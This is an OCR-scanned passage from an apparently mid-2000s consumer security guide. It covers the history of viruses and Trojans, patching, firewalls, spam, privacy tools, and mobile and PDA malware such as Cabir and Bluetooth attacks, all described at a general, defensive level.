frequently  used  files  at  the  speed  of  the  Internet  became  one  of 
the  most  serious  problems  in  computing  history. 

With  time,  other  macro  viruses  came  to  place.  In  the  summer 
of  1996,  there  appeared  the  “Laroux”  virus,  infecting  Microsoft 
Excel  spreadsheets.  As  it  had  been  with  “Concept”,  these  new  virus 
were  discovered  almost  simultaneously  by  several  companies.  Of 
course,  tracing  the  history  of  viruses,  macro  virus  construction 
sets  soon  begun  to  appear,  giving  rise  to  newer  and  more  danger- 
ous kinds  of  viruses.  In  the  beginning  of  1997  came  the  first  poly- 
morphic macro  virus  for  MS  Word  and  the  first  viruses  for 
Microsoft  Office97.  The  number  of  macro  viruses  also  increased 
steadily  reaching  several  hundreds  by  the  summer  of  1997.  As 
problematic  as  macro  viruses  were— and  they  are  a big  problem- 
macros  were  not  the  sole  attack  vectors. 

Threats,  Threats  Everywhere! 

Macro  viruses  were  not  the  only  new  threat  in  1995.  With  the  rise 
of  the  popularity  of  the  Internet,  hackers  made  their  presence  felt. 
The  Internet  gave  a lot  of  opportunities  to  hackers  everywhere. 
There  were  all  these  unsecured  servers  running  important  web- 
sites and  containing  vital  information  just  waiting  to  be  hacked. 
No  one  was  prepared  and  the  hackers  took  advantage  of  it. 
Hacking  soon  became  the  next  ‘cool’  thing,  with  every  teenager 
trying  desperately  to  learn  it  to  impress  his  friends. 

Hackers  attacked  the  Griffith  Air  Force  Base,  the  Korean  Atomic 
Research  Institute,  NASA’s  Goddard  Space  Flight  Center  near 
Washington  DC,  and  its  Jet  Propulsion  Laboratory.  Even  GE,  IBM, 
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Pipeline  and  other  companies  were  all  hit  by  the  “Internet 
Liberation  Front”  on  Thanksgiving. 

But  all  was  not  bad,  as  these  troubled  times  gave  rise  to  ethical 
hackers  and  some  of  the  smartest  brains  ever  to  grace  the  infor- 
mation technology  field. 

Soon,  common  vulnerabilities  in  systems  were  well  known  and 
while  the  creators  of  these  systems  attempted  to  plug  holes,  the 
script  kiddies  played  mischief.  Hacking  gave  rise  to  Trojan  Horses, 
these  new  tools  didn’t  require  foreknowledge  of  how  systems 
worked,  just  the  skill  to  press  buttons  in  the  correct  sequence.  The 
first  Trojan  was  discovered  in  1998  and  went  by  the  infamous  name 
“Back  Orifice”.  Back  Orifice  was  a tool  that  allowed  remote  admin- 
istration of  any  computer  that  it  infected.  With  Back  Orifice,  people 
could  take  over  remote  computers,  open  any  files,  delete  whatever 
they  wished  and  just  about  do  anything  harmful  they  wished. 

While  viruses  poured  in,  all  was  not  well  in  the  antivirus  camp. 
In  1997  almost  all  antivirus  vendors  were  fighting  each  other  in 
court,  or  just  making  a noise  about  each  other.  McAfee’s  “The 
Number  One  Choice  Worldwide.  No  Wonder  The  Doctor’s  Left 
Town”  led  to  name  calling  with  its  biggest  rival,  Dr  Solomon. 
McAfee  was  also  in  court  with  Trend  Micro  over  the  patent  for  e- 
mail  data  scanning. 

Dr  Solomon  was  accused  of  “cheating”,  because  its  scanner  sup- 
posedly shifted  into  “Advanced  Mode”  when  it  detected  a virus,  thus 
enabling  it  to  catch  a lot  of  other  viruses  that  would  otherwise  be 
invisible  under  the  “Normal  Mode”.  McAfee  claimed  that  this  was 
the  reason  that  Dr  Solomon  was  fast  to  scan  uninfected  disks,  and 
caught  more  viruses  in  tests  performed  with  virus  collections— 
though  we  still  fail  to  see  how  this  was  a “bad”  feature  for  an 
antivirus  to  have.  Symantec  was  also  accusing  McAfee  of  using 
Symantec  code  in  McAfee  products.  Needless  to  say,  there  was  a lot 
of  squabbling. 

However,  the  year  ended  on  a noteworthy  event— McAfee 
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Associates  and  Network  General  declared  consolidation  and 
Network  Associates  was  born.  This  company  promised  antivirus 
solutions  in  addition  to  encryption  and  network  administration 
services.  This  was  the  birth  of  NAI.  Eventually,  Dr  Solomon  was 
bought  by  NAI  for  US  $640  million.  The  event  shocked  the 
antivirus  world  as  the  conflict  between  the  two  antivirus  giants 
was  made  a thing  of  the  past  with  a simple  bargain.  In  the  process, 
one  of  the  most  notable  and  technologically  strong  antivirus  soft- 
ware manufacturers  lost  its  identity. 

The  year  1999  opened  a chapter  which  even  today,  poses  a 
major  threat.  Melissa  was  the  first  combination  of  a macro  virus 
and  a worm.  It  used  Outlook  and  Outlook  Express  to  send  itself  to 
others  via  e-mail.  Antivirus  software  scrambled  to  scan  your  e- 
mails,  certify  virus  free  e-mails  and  clog  bandwidth  with  unfortu- 
nate and  needed  overhead.  Melissa,  of  coursed  birthed  similar 
threats:  the  e-mail  worms. 

Today,  the  virus  threat  has  increased  a level  where  simple 
antivirus  packages  no  longer  cut  it.  With  Spyware,  Worms,  Trojans 
and  other  malicious  software  attacking  from  every  medium,  we 
now  need  more  complete  security  solutions.  Indeed,  Microsoft  has 
taken  security  to  heart  (never  too  late  to  start)  and  is  promising  to 
fight  the  threat  of  malicious  software  headlong. 


3.2  The  Mind  Of  A Vims  Writer 


So  what  makes  a person  create  a virus?  What  is  he  trying  to  prove  by 
spreading  chaos  and  destruction  that  can  only  win  him  jail-time  if 
caught?  The  popular  perception  of  a virus  writer  is  that  of  a dys- 
functional, pimple-faced  teenager;  with  no  girlfriend  and  no  life, 
who  taps  out  malicious  code  to  a backbeat  of  trance  music.  It  is  a very 
Hollywood  profile  and  not  exactly  the  most  accurate  profile.  Recent 
research  shows  that  most  virus  coders  are  well-adjusted  youths  who 
have  normal  relationships  with  their  family  and  friends  and  intend 
no  real  harm  with  the  viruses  they  write...  which  is  a big  problem. 
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The  trouble  is  they  don’t  believe  that  their  code  can  actually  hurt 
anyone,  which  is  the  mind  frame  of  most  teenagers  anyways.  Some 
do  it  out  of  personal  curiosity,  to  prove  a point;  others  do  it  to 
impress  their  peers,  while  still  others  do  it  to  enter  the  underground 
computing  communities.  These  communities  often  consider  virus 
writers  as  the  bottom  of  their  hierarchy  and  place  hackers  at  the  top. 

Virus  writers  represent  the  wild,  unpredictable  younger  sib- 
lings whose  unleashed  programs  are  uncontrollable.  Hacking  on 
the  other  hand  involves  different  and  more  refined  skills.  A hack- 
er tends  to  target  a specific  computing  system  and  make  a surgical 
strike.  While  hacking  is  all  about  gaining  control,  virus  writing  is 
all  about  uncontrolled  mayhem. 

Like  any  adolescent,  virus  writers  tend  to  mature  and  change 
their  ways.  Most  quit  the  activity  once  they  understand  the  rami- 
fications of  a virus  unleashed.  Ten  years  back,  virus  writers  fell  in 
the  14  to  17  year  old  bracket,  while  today  they’re  25  to  28.  Women 
have  been  known  to  write  viruses.  Like  all  things  social,  it  is  diffi- 
cult to  define  the  mind  of  a virus  writer. 

These  days  the  Internet  makes  it  easy  to  share  source  code.  In 
the  early  days  of  the  boot  sector  viruses,  writers  needed  a certain 
level  of  programming  skills.  Things  only  got  simpler  and  easier. 
What’s  more,  virus  writers  show  off  their  source  code  at  Web  sites 
and  distribute  the  kits  we  have  covered  above.  Anybody  with  the 
inclination  can  now  create  a virus. 

Society  also  sends  across  mixed  signals  to  potential  virus  ere 
ators.  While  the  law  seeks  to  throw  them  behind  bars,  security  com- 
panies have  been  known  to  either  hire  them  as  consultants  or  as  part 
of  their  workforce.  Even  the  press  paints  them  as  code  cowboys,  wild 
men  who  live  on  the  edge  and  dangerously.  The  attraction  is  obvious. 

So  what’s  the  motivation?  Malicious  intent,  honing  software 
skills,  exploiting  vulnerabilities,  experiments,  revenge,  hobby, 
peer  acceptance,  pride...  The  reasons  are  as  varied  as  the  viruses. 
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Not  even  the  best  software  can  save  you  from  disasters  if  you 
are  not  careful  about  certain  things.  This  section  will  explain 
all  the  necessary  precautions  you  should  take,  and  continue  to 
take,  in  order  to  protect  your  computer  from  malicious  software. 
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4.1  Patching  For  Security 


The  stark  reality  of  life— all  software  must  be  patched  at  some  time 
or  another!  No,  this  is  not  an  exaggerated  statement.  No  matter 
how  perfect  a software  seems  when  it’s  released,  people  are  bound 
to  find  bugs  and  security  holes  in  the  code.  So,  to  fix  these  nig- 


gling problems,  software  companies  release  patches  on  a regular 
basis.  This  really  isn’t  a big  deal  for  offline  programs  such  as  your 
CD  burning  utility  or  your  image  editor,  but  with  any  program 
that  functions  by  connecting  to  the  Internet-an  e-mail  client,  a 
Web  browser  or  even  media  players— patching  is  a priority. 

So  which  software  do  you  need  to  update?  Ideally,  you  should 
update  all  drivers  and  programs  that  you  use  on  a regular  basis. 
Your  top  priority,  however,  is  to  keep  your  operating  system  updat- 
ed with  the  latest  patches.  Luckily,  newer  Windows  OSes  such  as 
Windows  2000  and  windows  XP,  already  come  with  a Windows 
Update  utility  that  informs  you  of  any  new  security  fixes  released 
for  the  OS.  If  you  make  updation  a ritual,  your  computer  will  be  bet 
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ter  prepared  to  handle  the  majority  of  exploits  that  come  out. 
The  best  solution  for  the  Sasser  worm,  to  date,  is  a Windows  update 
session.  Many  Linux  distribution  companies  also  offer  this  service. 


Software  upgradation  for  the  programs  you  run  on  a regular 
basis  is  also  important.  A lot  of  exploits  are  often  found  in  every- 
day programs  such  as  browsers  and  instant  messengers,  which  can 
leave  your  computer  open  to  trojans  and  even  hacker  attacks.  It’s 
best  to  keep  the  auto-update  option  on  for  these  programs,  if  avail- 
able, so  you  don’t  have  to  bother  checking  for  updates  yourself. 

AutoPatcher 

For  those  who  can’t  update  their  operating  systems  regularly, 
there’s  one  application  that  could  be  the  answer  to  all  your  prayers— 
the  AutoPatcher.  Available  for  Windows  2000,  Windows  XP  and 
Windows  2003,  AutoPatcher  is  a collection  of  essential  patches  and 
updates  that  have  been  released  for  the  respective  operating  sys- 
tems. Updates  include  essential  patches  for  the  main  OS  kernel, 
Internet  Explorer,  Outlook  Express  and  other  Microsoft  products. 
Besides  these,  it  also  contains  some  great  freeware  to  tweak  and 
enhance  your  computing  experience,  along  with  the  latest  versions 
of  some  commonly  used  utilities. 


Autopatcher  is 
also  helpful  when 
you  do  a fresh 
install  of  your 
Windows  OS. 

Instead  of  running 
all  the  patches  one 
after  the  other  man- 
ually, or  wasting 
bandwidth  connect- 
ing to  Windows 
Update  and  re- 
downloading  all 
again,  Autopatcher  can  automatically  detect  the  updates  needed 
and  patch  up  your  Windows  install  for  you.  AutoPatcher  is  regular- 
ly provided  with  the  Digit  DVD. 


Xk\  AutoPaieher  4.6  - August  '04  - Gold  - Full  (August  2004) 


Auto  Pa  t< 


4 Wefcome  to  Autopatcher,  We  wfl  update  the  following  components  on  your  Windows 
installation: 

s-  0 Microsoft  Windows  XP  Pre-5P2  Patches 

I 0 Microsoft:  Windows  XP  Pre  SP2  Patches  - Critical 
s 0 Microsoft  Windows  XP  Pre-SP2  Patches  - Recommended 
ft  0 Microsoft  Internet  Explorer  and  Outlook  Express  Patches 
* 0 Microsoft  Internet  Expfarer  Patches 

a-  0 Microsoft  Outlook  Express  Patches 

ft  @ Microsoft  Windows  XP  Optional  Tools  and  Components 

0 Bootvts  Tool  (Verson  1,3.37) 

1 i Copy  Profile  Tool 

0 Allow  Windows  to  keep  hotfix  backups  for  unrstal  (Recommended) 
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4.2  Firewalls  And  Other  Methods  Of 
Protection 


Firewalls  were  only  used  as  a security  method  by  network  admin- 
istrators to  safeguard  their  servers  from  unauthorised  entry  by 
hackers.  The  new  age  of  Internet  threats  and  the  rise  in  malicious 
software  means  that  firewalls  are  somewhat  of  a necessity  for 
every  computer.  Why  else  would  Microsoft  include  a firewall  with 
its  Windows  XP  SP2  operating  system?  But  before  we  get  into  that, 
let’s  talk  about  the  basics,  starting  from  what  a firewall  really  is: 

In  the  traditional  sense,  a firewall  is  a hardware  device  or  soft- 
ware application  that  functions  in  a networked  environment  to  pre- 
vent certain  communication  that’s  forbidden  by  security  policy.  It  fil- 
ters all  network  packets,  and  determines  whether  to  allow  or  block 
them.  It  achieves  this  by  screening  the  requests  and  determining 
whether  they  originate  from  known  and  reliable  sources.  When  an 
unauthorised  entry  is  attempted,  say,  a hacker  trying  to  access  your 
files,  or  undetected  spyware  trying  to  send  out  information,  the  fire- 
wall blocks  it  and  also  makes  your  computer  invisible  to  external  net- 
works, which  is  great,  as  you  can’t  attack  what  you  can’t  see. 
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This  book  will  only  discuss  personal  firewalls,  which  are  soft- 
ware applications  made  for  end-users.  A personal  firewall  will  not 
usually  protect  any  more  than  the  one  PC  it  is  installed  on,  unless 
other  PCs  are  sharing  Internet  connectivity  via  the  protected  PC. 
There  are  many  misconceptions  about  firewalls;  most  people  mis- 
understand what  a firewall  does  for  you.  Here’s  a little  explana- 
tion to  clear  things  up. 

What  Can  A Firewall  Do? 

Generally,  firewalls  are  configured  to  protect  against  unauthenti- 
cated logins  from  the  ‘outside  world’.  This,  more  than  anything, 
helps  prevent  vandals  from  logging  into  machines  on  your  net- 
work. More  elaborate  firewalls  block  traffic  coming  into  a PC,  but 
allow  outgoing  traffic.  Firewalls  can  also  provide  a single  ‘choke 
point’— in  a situation  where  a computer  system  is  being  attacked 
by  someone  dialling  in  with  a modem,  a firewall  can  act  as  an 
effective  ‘phone  tap’  and  tracing  tool.  Firewalls  provide  an  impor- 
tant logging  and  auditing  function— they  provide  summaries 
about  the  amount  and  different  types  of  traffic  that  have  passed 
through  it,  how  many  attempts  were  made  to  break  in,  and  so  on. 

What  Can't  A Firewall  Do? 

Firewalls  can’t  protect  you  against  attacks  that  come  through  soft- 
ware that  your  firewall  isn’t  protecting.  For  instance,  when  you 
install  the  firewall  and  then  run  a P2P  software,  the  firewall  asks 
whether  you  want  it  to  monitor  that  software.  More  often  than 
not,  we  disable  monitoring  of  software  because  we  want  as  little 
interference  as  possible.  Now  if  there  are  security  holes  in  the  P2P 
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software,  your  computer  is  as  vulnerable  to  it  as  when  you  didn’t 
have  a firewall.  It’s  very  important  to  consider  what  type  of  soft- 
ware you  are  disabling  firewall  protection  for. 


A major  misconception  that  people  have  is  that  firewalls  are 
effective  against  viruses.  An  antivirus  software  can  protect  your 
machine  from  viruses,  the  maximum  a firewall  can  do  is  block  worm 
and  trojan  attacks  that  originate  over  the  network  or  via  the  Internet. 
However,  a firewall  that’s  a part  of  a security  suite,  comes  bundled 
with  an  antivirus  that  can  help  your  against  malicious  attacks. 

Spam 

Spam  blockers  have  become  an  integral  part  of  a secure  computer. 
There  was  a time  when  spam  could  have  been  taken  as  harmless 
advertising,  but  now  with  the  constant  threat  of  malicious  codes 
entering  your  system  through  spam,  you  need  to  take  some  serious 
precautions  against  it.  But  first,  let’s  start  from  the  top. 


Spamming  is  the  buzzword  used  for  the  use  of  any  electronic 
communications  medium  to  send  unsolicited  messages  in  bulk. 
The  most  common  form  of  spam  is  delivered  in  e-mail  inboxes  as 
a form  of  commercial  advertising.  What  differentiates  spam  from 
solicited  advertising,  or  newsletters,  is  that  you  never  signed  up  to 
receive  it  anywhere. 


E-mail  spamming  involves  sending  identical  or  almost  identi- 
cal e-mail  messages  to  a large  number  of  recipients.  Spam  usually 
contains  various  tricks  to  bypass  e-mail  filters.  Spammers  obtain  e- 
mail  addresses  by  a number  of  means— some  buy  databases  from 
popular  Web-based  sites  that  require  you  to  sign  up,  some  harvest 
addresses  from  Usenet  postings,  DNS  listings,  bulk  forwards  or 
Web  pages.  Some  even  go  to  the  extent  of  guessing  common 
names  at  known  domains  (also  known  as  a dictionary  attack). 

Problems  Caused  By  Spam 

The  reason  spam  is  considered  such  a major  issue  among  the  mass- 
es is  for  a number  of  reasons.  Firstly,  we  waste  a lot  of  time  and 
bandwidth  sorting  through  and  downloading  these  useless  e- 
mails.  Many  popular  e-mail  providers  will  still  deliver  fifty  to  a 
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hundred  spam  messages  everyday  to  your  inbox,  despite  their 
inbuilt  spam  filtering  technology.  Not  only  is  it  frustrating  to  fil- 
ter legitimate  mail  from  the  junk,  but  spam  can  also  fill  your  allo- 
cated inbox  space,  preventing  you  from  receiving  important  mails. 


It’s  not  only  the  quantity  of  spam  that’s  an  issue,  even  the  con- 
tent of  the  mails  are  questionable.  A large  percentage  of  spam  con- 
tains ads  for  pornographic  Web  sites  or  other  such  places  that  can 
be  unacceptable  viewing  for  many,  especially  children. 


Spam  is  usually  sent  from  dedicated  machines  that  may  not 
have  the  required  security  measures  to  ensure  that  the  mail  is  not 
carrying  any  malicious  code  or  a virus.  Opening  a spam  mail  could 
immediately  infect  your  PC  with  spyware  or  a worm  without  your 
knowledge.  Another  big  problem  these  days  are  spambots.  Some 
spammers  have  created  various  e-mail  viruses  that  will  turn  your 
PC  into  a spambot  that  will  inform  the  spammer  of  its  existence, 
and  the  spammer  will  command  it  to  send  a low  volume  of  spam. 
This  allows  spammers  to  send  spam  without  being  caught  by  their 
ISPs  or  being  tracked  down  by  anti-spammers  as  the  low  volume 
makes  it  hard  to  detect. 

Precaution  Against  Spam 

There  are  many  ways  to  deal  with  spam,  some  of  them  may  con- 
sume time,  or  consume  money.  The  oldest  method  used  to  get  rid 
of  junk  mail  is  manual  deletion  of  everything  that  comes  in  your 
mailbox  from  an  unfamiliar  source.  It’s  free,  and  effective  for  any- 
one who  gets  very  little  spam  in  their  mailboxes.  Unfortunately, 
not  everyone  is  that  lucky  when  it  comes  to  spam. 


A great  way  to  get  rid  of  spam  is  to  manually  set  filters.  Most 
Web-based  e-mail  services  have  a button  that  allows  you  to  cate- 
gorise all  marked  mails  as  spam,  so  the  next  time  you  get 
spammed  from  the  same  source,  the  mail  is  automatically  redi- 
rected to  a junk  mail  folder.  Even  e-mail  clients  have  provisions  for 
e-mail  filters.  You  can  set  up  some  common  spam  words  as  a filter 
to  redirect  your  mail  to  the  trash  or  a separate  junk  mail  folder. 
This  method  is  effective  to  an  extent,  but  not  completely,  as  many 
spammers  use  more  and  more  innovative  techniques  to  get  past 
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the  filters,  like  writing  a commonly  filtered  word  like  ‘Sex’  as 
‘S  E X’,  ‘S*E*X’  or  even  ‘5  E ><’. 


The  most  effective  way  to  avoid  unsolicited  mail  is  by  using 
good  anti-spam  software.  Packages  such  as  E-mailProtect  (see  chap- 
ter 5.2)  for  example,  are  capable  of  dynamic,  real-time  filtering  of 
inbound  e-mail,  based  on  approved  word  and  e-mail  address  lists. 
It  sends  all  unsolicited  and  potentially  dangerous  e-mail  to  a quar- 
antine folder  where  you  can  disable  various  aspects  of  the  mail  in 
order  to  preview  it  safely.  Anti-spam  software  have  intelligent 
engines  that  have  an  excellent  ability  to  sort  the  spam  from  useful 
mail,  which  is  perfect  for  someone  who’s  mailbox  is  generally 
flooded  with  junk.  You  can  easily  setup  whitelists  and  blacklists  to 
help  the  anti-spam  utilities  identify  a useful  mail  that  may  come 
across  as  spam.  The  only  drawback  is  that  most  anti-spam  software 
work  only  with  e-mail  clients,  so  if  you’re  using  a Web-based  mail 
facility,  an  anti-spam  application  will  not  be  much  help. 

Privacy  Protection 

A lot  of  Internet  users  don’t  realise  that  what  they  do  online  can 
be  easily  traced  back  to  them.  In  fact,  if  you  just  monitor  an 
Internet  user’s  activity  for  a period  of  time,  you  can  tell  what’s 
happening  in  his  life.  It’s  a scary  thought  that  if  someone  takes 
enough  initiative,  all  your  information  can  be  easily  accessible  like 
an  open  book. 

To  access  most  services  on  the  Internet,  we  need  to  give  out 
some  accurate  private  information,  such  as  our  addresses,  what  we 
do,  how  much  we  earn  and  even  our  credit  card  numbers.  Though 
most  Web  sites  are  quite  secure  with  this  information,  chances  are, 
there  are  cookies  left  behind  on  your  machine  that  store  every- 
thing you’ve  written.  Your  browser  history  stores  information 
about  every  page  you  surfed,  and  some  of  the  pictures  that  you 
accessed  on  the  Net  can  be  found  in  your  temporary  Internet  files. 

We  don’t  intend  to  make  you  paranoid  about  technology  or  the 
Internet,  in  fact  most  home  users  are  not  really  under  much 
threat  at  all;  but  a corporation  with  many  rivals  in  the  same  busi- 
ness needs  to  be  careful  about  the  kind  of  traces  it  leaves  behind. 
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If  you  think  you  could  be  under  a similar  threat,  you  should  defi- 
nitely invest  in  privacy  protection  software. 


There  are  many  solutions  available  for  privacy  protection: 
some  packages  are  available  independently,  while  others  come  in 
a security  suite  (more  in  Chapter  5.2).  A privacy  protection  soft- 
ware basically  eliminates  your  Internet  and  computer  usage  traces 
by  wiping  clean  all  history,  cookies,  temporary  files  etc.  depending 
on  what  level  of  protection  you  set  it  to.  You  can  clean  up  all 
cached  files  and  registry  traces  at  the  click  of  a button,  or  do  it 
automatically  every  time  you  log  off  your  computer.  The  best  part 
about  deleting  files  using  a privacy  protection  program  is  that 
once  a file  is  deleted,  it’s  practically  unrecoverable  even  by  a recov- 
ery or  undelete  tool. 
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4.3  Gadgets  Under  Threat 


1! 


If  your  computer  wasn’t  threatened  enough,  now  you  have  to  con- 
tend with  malicious  code  written  for  your  gadgets  as  well.  Virus 
makers  are  moving  on  to  new  avenues,  and  it  seems  their  slogan  is 
“If  it  has  an  OS,  we’ll 
infect  it!”  It  is  counter- 
productive, can  cause 
harm  to  a lot  of  people, 
but  sadly,  it  is  reality. 


Mobile  Phones 

The  Symbian  series  60 
phones,  such  as  the 
Nokia  6600  and  7610, 
have  become  the 
favourite  targets  for 
new  age  virus  makers. 
After  all,  there  are 
innumerable  software 
packages  available  for 
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these  phones  that  can  be  down- 
loaded to  your  computer  and 
installed  on  the  phone— or  even 
installed  directly  via  GPRS.  With 
the  platform  gaining  so  much 
popularity,  it  was  only  a matter 
of  time  before  it  captured  virus 
makers’  attention.  Since  the  plat- 
form is  new,  people  are  gullible 
enough  to  download  whatever 
upgrades  they  can  find  for  their 
phones,  and  the  virus  scare  has- 
n’t really  spread  enough  to  make 
the  people  think  twice— it’s  the 
perfect  opportunity  for  virus 
makers  to  spread  their  work  and 
gain  recognition. 


One  of  the  best  known  viruses  for  series  60  phones  is  ‘Cabir’,  a 
somewhat  malicious  piece  of  code  that  drains  batteries  and  propa- 
gates itself  via  Bluetooth.  The  fact  that  a virus  as  avoidable  as  Cabir 
managed  to  spread  amongst  the  masses,  gives  us  a clue  as  to  how 
gullible  everyday  mobile  users  can  be.  To  get  infected  by  Cabir,  your 
phone  needs  to  be  in  discoverable  Bluetooth  mode— visible  to  all 
nearby  devices.  If  an  infected  phone  tries  to  infect  your  phone,  you 
get  a note  asking  you  to  accept  a message  from  an  unknown  device. 
If  you  accept,  another  dialog  box  asks  if  you  really  want  to  install 
an  unverified  program.  Then  if  you  click  accept,  you  get  a third  dia- 
log box  that  says,  “Install  Caribe?”,  which  should  be  sufficient 
warning  to  anyone  in  today’s  day  and  age  about  malicious  code. 
Despite  three  ominous  warnings,  people  were  infected,  leaving  us 
to  believe  that  they  deserved  to  be  infected  in  the  first  place. 


The  success  of  Cabir  got  virus  developers  thinking,  and  today, 
more  advanced  viruses  such  as  Skulls  and  METAL  Gear  for 
Symbian  series  60  phones  are  posing  a threat  via  Bluetooth.  The 
good  thing  about  Bluetooth  is  that  at  least  you  can  reject  an  invi- 
tation sent  by  the  virus;  MMS  on  the  other  hand  is  a different  ball 
game.  With  Bluetooth,  viruses  can  only  spread  over  short  ranges, 
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but  with  MMS,  a virus 
can  send  itself  across 
the  world— as  is  the  case 
of  CommWarrior.a.  Just 
like  a worm  on  your  PC, 

CommWarrior  scans 
the  phone’s  address 
book  and  periodically 
sends  MMS  messages  to 
randomly  selected  con- 
tacts. It  sends  a copy  of  itself  and  one  of  several  predefined  text 
messages  designed  to  encourage  the  recipient  to  install  the  appli- 
cation. The  good  thing  is  that  the  application  is  still  only  installed 
by  your  choice. 

There  are  many  other  things  besides  viruses  that  are  consid- 
ered a nuisance  by  smartphone  users,  all  related  to  Bluetooth.  A 
few  of  these  are  as  listed  below: 

Bluejacking:  Although  known  to  the  technical  community  and 
early  adopters  for  some  time,  the  process  now  known  as 
‘Bluejacking’  has  recently  come  to  focus  in  the  consumer  arena, 
and  is  becoming  a popular  mechanism  for  exchanging  anonymous 
messages  in  public  places.  The  technique  involves  abusing  the 
Bluetooth  ‘pairing’  protocol,  the  system  by  which  Bluetooth 
devices  authenticate  each  other,  to  pass  a message  during  the  ini- 
tial ‘handshake’  phase.  This  is  possible  because  the  ‘name’  of  the 
initiating  Bluetooth  device  is  displayed  on  the  target  device  as  part 
of  the  handshake  exchange.  As  the  protocol  allows  a large  user 
defined  name  field— up  to  248  characters— the  field  itself  can  be 
used  to  pass  the  message. 

SNARF  Attacking:  It  is  possible,  on  some  mobile  phones,  to  con- 
nect via  Bluetooth  without  alerting  the  owner  of  the  phone.  The 
person  connecting  to  the  target  phone  gains  access  to  the  phone- 
book,  messages  and  other  important  data.  This  is  normally  only 
possible  if  the  device  is  in  ‘discoverable’  or  ‘visible’  mode,  but 
there  are  tools  available  on  the  Internet  that  allow  even  this  safe- 
ty Net  to  be  bypassed. 
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Backdoor  Attacking:  The  backdoor  attack  involves  establishing  a 
trust  relationship  through  the  ‘pairing’  mechanism,  but  ensuring 
that  it  no  longer  appears  in  the  target’s  register  of  paired  devices. 
In  this  way,  unless  you  are  actually  observing  your  device  at  the 
precise  moment  a connection  is  established,  you  are  unlikely  to 
notice  anything  untoward,  and  the  attacker  is  free  to  use  any 
allowed  resource  for  trusted  devices,  such  as  file  transfers.  This 
means  that  not  only  can  data  be  retrieved  from  the  phone,  but 
other  services,  such  as  modems  or  Internet,  WAP  and  GPRS  gate- 
ways may  be  accessed  without  the  owner’s  knowledge  or  consent. 


Bluebug  Attacking:  The  Bluebug  attack  creates  a serial  profile  con- 
nection to  the  device,  thereby  giving  full  access  to  the  AT  com- 
mand set,  which  can  then  be  exploited  using  standard  off  the 
shelf  tools,  such  as  PPP  for  networking  and  gnokii  for  messaging, 
contact  management,  diverts  and  initiating  calls.  With  this  facili- 
ty, it  is  possible  to  use  the  phone  to  initiate  calls  to  paid  numbers, 
send  or  read  SMS  messages,  connect  to  data  services  such  as  the 
Internet,  and  even  monitor  conversations  in  the  vicinity  of  the 
phone.  Monitoring  conversations  is  done  via  a voice  call  over  the 
GSM  network,  so  the  listening  post  can  be  anywhere  in  the  world. 
Bluetooth  access  is  only  required  for  a few  seconds  in  order  to  set 
up  the  call.  Call  forwarding  diverts  can  be  set  up,  allowing  the 
owner’s  incoming  calls  to  be  intercepted,  either  to  provide  a 
channel  for  calls  to  more  expensive  destinations,  or  for  theft  by 
impersonation  of  the  victim. 


The  way  the  trend  is  going,  it  seems  that  2005  will  see  a big  rise 
in  the  number  of  mobile  phone  virus- 
es. That’s  why  companies  such  as 
SimWorks  International  Limited  have 
already  worked  out  an  antivirus  for 
the  Symbian  series  60  phones. 

SimWorks  Anti-Virus  protects 
phones  from  all  known  viruses 
including  Cabir  a,  Cabir  b,  Cabir  c, 
the  Mosquitoes  dialer  and  the  Skulls 
trojan.  The  antivirus  is  basically  a 
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phone  based  application  that  auto-starts  when  you  switch  on  your 
phone.  It  scans  incoming  messages  and  programs  in  real-time  for 
viruses,  stopping  most  malicious  software  at  the  root  itself.  Just 
like  a PC  antivirus,  you  also  have  an  option  to  scan  the  phone 
manually  or  schedule  phone  scans.  You  can  even  download 
updates  from  the  SimWorlcs  Web  site— http://www.simworks. 
biz/sav/AntiVirus.php 

PDA  viruses 

The  world’s  first  PDA  virus  was  discovered  running  in  a Windows 
CE-based  Pocket  PC  in  2004,  but  then  again,  who  didn’t  see  that 
coming?  With  PDA’s  getting  closer  to  being  full  fledged  PCs,  and 
the  tremendous  amount  of  independent  software  development 
for  it,  it  was  only  a matter  of  time  before  virus  developers  would 
pick  up  the  SDK  and  write  away. 


The  first  virus  discovered  on  the  Pocket  PC  was  a classic  Trojan 
backdoor  program  called  ‘Brador.a’.  When  Brador.a  is  launched,  it 
copies  itself  to  Windows/StartUp/Svchost.exe  so  that  it  starts  when 
Windows  starts.  In  doing  so,  it  continually  attempts  to  send  the 
attacker  the  IP  address  of  the  handheld  by  e-mail  until  it  succeeds; 
then  it  waits  for  further  instructions  from  the  attacker.  The  virus 
allows  the  attacker  to  remotely  list  the  directory  contents,  upload 
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a file,  display  a message 
box,  download  a file  and 
execute  specified  com- 
mands. However,  the  good 
thing  is  that  this  trojan 
won’t  really  start  acting  up 
until  you  execute  it  for  the 
first  time,  so  just  be  careful 
about  the  kind  of  programs  you  run  on  your  PDA. 


Palm  OS  owners  aren't  completely  safe  either.  There  have  been 
three  major  viruses  detected  for  the  Palm  OS  in  recent  times.  First, 
there’s  the  ‘Liberty  Crack’  Trojan  horse  program  that  can  wipe  out 
all  the  files  from  a PDA  running  the  Palm  OS.  Then  there’s  also  the 
Palm  ‘Vapor’  virus;  another  Trojan  horse  that  renders  all  third- 
party  application  icons  invisible,  appearing  as  if  they  had  been 
deleted.  The  third  is  the  more  heinous  and  more  malicious  ‘Palm 
OS/Phage’  virus,  which  fills  the  device’s  screen  with  a grey  box, 
crashes  the  application  that  is  running,  and  then  replicates  itself. 


As  always,  prevention  is  better  than  cure.  As  of  now  viruses 
on  PDAs  are  not  smart  enough  to  spread  without  the  help  of 
user  ignorance,  so  it’s  up  to  you  to  be  vigilant  about  the  things 
you  accept,  and  the  applications  you  install  on  your  PDA.  Of 
course  when  all  else  fails  there’s  always  the  age  old  antivirus 
you  can  depend  upon. 


Here  are  a few  antivirus  packages  offered  by  known  companies 
to  keep  your  PDA  secure. 

McAfee  VirusScan  PDA  Enterprise  2.0 


Platform;  Windows  Pocket  2002,  Windows  Mobile  2003 

Based  on  the  McAfee  scan  engine,  VirusScan  PDA  employs 
advanced  detection  and  cleaning  techniques  to  prevent  all  kinds 
of  viruses  and  other  malicious  code.  It  features  real-time  virus 
detection  and  on-demand/on  schedule  detection.  The  automatic 
updating  ensures  that  the  devices  have  the  latest  virus  updates. 
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AirScanner  Mobile  Antivirus  Pro 

Platform:  PocketPC  2003,  Windows  Mobile  2003 

The  AirScanner  Mobile  Antivirus  Pro  can  quarantine  or  eradi- 
cate embedded  viruses  and  malware  with  its  fast  and  optimised 
scanning  speeds.  Just  as  any  good  virus  scanner  should, 
AirScanner  features  automatic,  online  updates  of  virus  signa- 
